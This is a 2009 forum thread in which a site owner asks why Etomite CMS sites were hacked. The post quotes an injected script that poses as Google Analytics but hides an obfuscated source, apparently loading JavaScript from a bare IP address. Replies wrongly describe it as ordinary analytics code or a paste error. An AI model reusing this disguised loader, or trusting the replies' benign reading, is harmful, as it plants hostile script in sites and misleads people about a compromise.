I've got two sites running etomite (v1.1 and one from july2008) that recently got hacked. Etomite is the only thing they have in common. Something goes through and tries to add the following to all the index.php files it can find as well as add's new index.html files that say something like 'nothing to see here'. Only problem is it doesn't parse and breaks the site.
It appears to try to add some Google Analytics code:
<?php echo '<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7623457-2");
pageTracker._trackPageview();
} catch(err) {}</script>'; ?>
This may not be etomite. One site has wordpress installed which may be the issue.
Does this sound familiar to anybody? I googled UA-7623457-2 and found other people with a similar issue, but no one new what it was yet.
0
Etomite exploit of some kind?
Started by DropDeadFred, Jun 23 2009 09:27 PM
3 replies to this topic
#2
-
- Admin
-
- 4,746 posts
Loves Etomite Forums!
- Gender:Male
Posted 23 June 2009 - 09:30 PM
That script there is google analytics code (site stats).
nothing to see here files are meant to be in the assets folder (and recursive folders).
There aren't any know exploits for etomite - it could be something at server level though..
nothing to see here files are meant to be in the assets folder (and recursive folders).
There aren't any know exploits for etomite - it could be something at server level though..
#3
-
- Member
- 26 posts
Etomite Forum Newbie
Posted 24 June 2009 - 12:00 AM
DeanC, on Jun 23 2009, 03:30 PM, said:
That script there is google analytics code (site stats).
nothing to see here files are meant to be in the assets folder (and recursive folders).
There aren't any know exploits for etomite - it could be something at server level though..
nothing to see here files are meant to be in the assets folder (and recursive folders).
There aren't any know exploits for etomite - it could be something at server level though..
Thanks, I'll keep checking. It's that 'known' issue that I'm worried about at this point.
#4
-
- Member
-
- 236 posts
Likes Etomite Forums!
Posted 29 June 2009 - 08:53 PM
Hi there
Have you tried checking in the manager of the file to see that it it shouldn't be rich text?
Perhaps the end user or client has pasted that right into the WYSIWYG editor, without turning on the HTML source toggle button first.
I always advise that these chunks of script are inserted directly into the template, or called via a chunk.
Not sure if what I'm answering is the solution to this or not, but hope it's helpful, anyway.
Have you tried checking in the manager of the file to see that it it shouldn't be rich text?
Perhaps the end user or client has pasted that right into the WYSIWYG editor, without turning on the HTML source toggle button first.
I always advise that these chunks of script are inserted directly into the template, or called via a chunk.
Not sure if what I'm answering is the solution to this or not, but hope it's helpful, anyway.
1 user(s) are reading this topic
0 members, 1 guests, 0 anonymous users
